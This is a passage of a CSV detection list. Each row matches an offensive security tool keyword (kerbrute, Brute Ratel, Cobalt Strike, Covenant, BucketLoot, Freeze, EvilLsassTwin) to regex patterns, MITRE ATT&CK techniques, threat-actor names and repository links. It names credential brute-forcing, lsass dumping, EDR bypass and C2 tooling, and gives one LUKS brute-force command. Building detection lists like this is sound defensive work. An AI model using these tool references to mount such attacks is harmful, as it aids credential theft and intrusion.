"*BruteforceCLSIDs.*",".{0,1000}BruteforceCLSIDs\..{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","10","8","767","97","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" "*bruteForceCombos*",".{0,1000}bruteForceCombos.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*Brute-force-Instagram-*.git*",".{0,1000}Brute\-force\-Instagram\-.{0,1000}\.git.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","1","N/A","7","1","47","10","2024-04-23T02:47:28Z","2020-11-20T22:22:48Z" "*bruteforce-luks -*",".{0,1000}bruteforce\-luks\s\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*bruteforce-luks -t 4 -l 5 -m 5 /dev/sdb1*",".{0,1000}bruteforce\-luks\s\-t\s4\s\-l\s5\s\-m\s5\s\/dev\/sdb1.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*bruteForceUser*",".{0,1000}bruteForceUser.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*bruteloader*",".{0,1000}bruteloader.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*brute-locadmin *",".{0,1000}brute\-locadmin\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*brute-ratel-*",".{0,1000}brute\-ratel\-.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*BruteRatel*.tar.gz*",".{0,1000}BruteRatel.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*BruteRatel*.zip*",".{0,1000}BruteRatel.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bruteratel.com/*",".{0,1000}bruteratel\.com\/.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bruteratel/*",".{0,1000}bruteratel\/.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*Brute-Ratel-C4*",".{0,1000}Brute\-Ratel\-C4.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*Brutesploit.git*",".{0,1000}Brutesploit\.git.{0,1000}","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","694","270","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" "*BruteSploit/wlist/*",".{0,1000}BruteSploit\/wlist\/.{0,1000}","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","694","270","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" "*brutespray -*",".{0,1000}brutespray\s\-.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*brutespray.exe*",".{0,1000}brutespray.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","1","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*brutespray.go*",".{0,1000}brutespray\.go.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","1","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*brutespray/brute*",".{0,1000}brutespray\/brute.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","1","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*brutespray-output*",".{0,1000}brutespray\-output.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*BruteStager.csproj*",".{0,1000}BruteStager\.csproj.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*BruteStager.sln*",".{0,1000}BruteStager\.sln.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*bruteuser.go*",".{0,1000}bruteuser\.go.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*bruteuserCmd*",".{0,1000}bruteuserCmd.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*BruteX*",".{0,1000}BruteX.{0,1000}","offensive_tool_keyword","BruteX","Automatically brute force all services running on a target. Open ports. Usernames Passwords","T1110","TA0007 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/1N3/BruteX","1","0","N/A","10","10","1841","563","2023-08-16T04:00:18Z","2015-06-01T22:28:19Z" "*bshinject*",".{0,1000}bshinject.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*bshinject*",".{0,1000}bshinject.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bshspawn*",".{0,1000}bshspawn.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*bsteal_token*",".{0,1000}bsteal_token.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*bsteal_token*",".{0,1000}bsteal_token.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bucketloot -*",".{0,1000}bucketloot\s\-.{0,1000}","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","0","N/A","7","4","333","49","2024-04-13T11:14:24Z","2023-07-17T09:06:14Z" "*bucketloot https://*",".{0,1000}bucketloot\shttps\:\/\/.{0,1000}","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","0","N/A","7","4","333","49","2024-04-13T11:14:24Z","2023-07-17T09:06:14Z" "*bucketloot.exe -*",".{0,1000}bucketloot\.exe\s\-.{0,1000}","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","0","N/A","7","4","333","49","2024-04-13T11:14:24Z","2023-07-17T09:06:14Z" "*bucketloot.exe https://*",".{0,1000}bucketloot\.exe\shttps\:\/\/.{0,1000}","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","0","N/A","7","4","333","49","2024-04-13T11:14:24Z","2023-07-17T09:06:14Z" "*bucketloot-darwin64*",".{0,1000}bucketloot\-darwin64.{0,1000}","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","7","4","333","49","2024-04-13T11:14:24Z","2023-07-17T09:06:14Z" "*bucketloot-freebsd64*",".{0,1000}bucketloot\-freebsd64.{0,1000}","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","7","4","333","49","2024-04-13T11:14:24Z","2023-07-17T09:06:14Z" "*BucketLoot-master*",".{0,1000}BucketLoot\-master.{0,1000}","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","7","4","333","49","2024-04-13T11:14:24Z","2023-07-17T09:06:14Z" "*bucketloot-openbsd64*",".{0,1000}bucketloot\-openbsd64.{0,1000}","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","7","4","333","49","2024-04-13T11:14:24Z","2023-07-17T09:06:14Z" "*bucketloot-windows32.exe*",".{0,1000}bucketloot\-windows32\.exe.{0,1000}","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","7","4","333","49","2024-04-13T11:14:24Z","2023-07-17T09:06:14Z" "*bucketloot-windows64.exe*",".{0,1000}bucketloot\-windows64\.exe.{0,1000}","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","7","4","333","49","2024-04-13T11:14:24Z","2023-07-17T09:06:14Z" "*buffer_overflow.py*",".{0,1000}buffer_overflow\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*-Build $RandomAttackPath*",".{0,1000}\-Build\s\$RandomAttackPath.{0,1000}","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/mvelazc0/BadZure/","1","0","N/A","5","4","350","20","2023-12-04T16:14:07Z","2023-05-05T04:52:21Z" "*Build Evil Lsass Twin*",".{0,1000}Build\sEvil\sLsass\sTwin.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*build Freeze.go*",".{0,1000}build\sFreeze\.go.{0,1000}","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","0","N/A","N/A","10","1378","171","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z" "*build GoStompy.go*",".{0,1000}build\sGoStompy\.go.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","0","N/A","10","1","45","7","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z" "*build SourcePoint.go*",".{0,1000}build\sSourcePoint\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","0","N/A","10","10","971","149","2024-04-02T20:12:17Z","2021-08-06T20:55:26Z" "*build Supernova.go*",".{0,1000}build\sSupernova\.go.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","6","573","100","2024-04-30T14:35:29Z","2023-08-08T11:30:34Z" "*build ZipExec.go*",".{0,1000}build\sZipExec\.go.{0,1000}","offensive_tool_keyword","ZipExec","A unique technique to execute binaries from a password protected zip","T1560.001 - T1204.002 - T1059.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Tylous/ZipExec","1","0","N/A","9","10","993","156","2022-07-01T16:25:26Z","2021-10-19T21:03:44Z" "*build.ps1 -commands * -profile *selfcontained -singlefile*",".{0,1000}build\.ps1\s\-commands\s.{0,1000}\s\-profile\s.{0,1000}selfcontained\s\-singlefile.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 